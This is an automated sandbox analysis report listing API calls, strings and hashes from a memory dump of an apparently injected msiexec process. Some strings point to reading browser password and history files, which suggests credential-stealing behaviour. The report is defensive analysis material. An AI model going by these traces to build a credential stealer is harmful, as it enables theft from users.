                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                        • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1471605966-0
                                                                                                                                                      • Opcode ID: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                                                                                      • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                      • Opcode Fuzzy Hash: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                                                                                      • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                      APIs
                                                                                                                                                      • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                      • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                      • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                      • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                        • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                                                                        • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                      • String ID: \StringFileInfo\
                                                                                                                                                      • API String ID: 102104167-2245444037
                                                                                                                                                      • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                      • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                      • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                      • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                      APIs
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??3@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                      • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                      • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                      • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                      • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memicmpwcslen
                                                                                                                                                      • String ID: @@@@$History
                                                                                                                                                      • API String ID: 1872909662-685208920
                                                                                                                                                      • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                      • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                                                      • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                      • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 004100FB
                                                                                                                                                      • memset.MSVCRT ref: 00410112
                                                                                                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                      • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                      • String ID: </%s>
                                                                                                                                                      • API String ID: 3400436232-259020660
                                                                                                                                                      • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                      • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                      • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                      • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040D58D
                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                      • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                      • String ID: caption
                                                                                                                                                      • API String ID: 1523050162-4135340389
                                                                                                                                                      • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                      • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                      • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                      • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                        • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                      • String ID: MS Sans Serif
                                                                                                                                                      • API String ID: 210187428-168460110
                                                                                                                                                      • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                      • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                      • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                      • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClassName_wcsicmpmemset
                                                                                                                                                      • String ID: edit
                                                                                                                                                      • API String ID: 2747424523-2167791130
                                                                                                                                                      • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                      • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                                                      • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                      • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                      • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                      • API String ID: 3150196962-1506664499
                                                                                                                                                      • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                                                                      • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                                                      • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                                                                      • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                                                      APIs
                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                                                      • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                                                      • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                                                                      • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$memcmp
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3384217055-0
                                                                                                                                                      • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                      • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                      • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                      • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$memcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 368790112-0
                                                                                                                                                      • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                      • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                                      • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                      • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                        • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                        • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                      • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                      • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                      • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                      • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1889144086-0
                                                                                                                                                      • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                      • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                                                      • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                      • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1661045500-0
                                                                                                                                                      • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                      • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                                                      • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                      • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                                                                      Strings
                                                                                                                                                      • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                      • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                      • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                      • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                      • API String ID: 1297977491-2063813899
                                                                                                                                                      • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                      • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                                                      • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                      • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040560C
                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                        • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                      • String ID: *.*$dat$wand.dat
                                                                                                                                                      • API String ID: 2618321458-1828844352
                                                                                                                                                      • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                      • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                      • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                      • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                      • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                      • _wtoi.MSVCRT(?), ref: 00410C80
                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1549203181-0
                                                                                                                                                      • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                      • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                                                      • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                      • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00412057
                                                                                                                                                        • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                      • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                      • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                      • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3550944819-0
                                                                                                                                                      • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                      • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                      • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                      • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                      APIs
                                                                                                                                                      • free.MSVCRT ref: 0040F561
                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                      • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$free
                                                                                                                                                      • String ID: g4@
                                                                                                                                                      • API String ID: 2888793982-2133833424
                                                                                                                                                      • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                                      • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                      • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                                      • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                      APIs
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy
                                                                                                                                                      • String ID: @
                                                                                                                                                      • API String ID: 3510742995-2766056989
                                                                                                                                                      • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                      • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                      • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
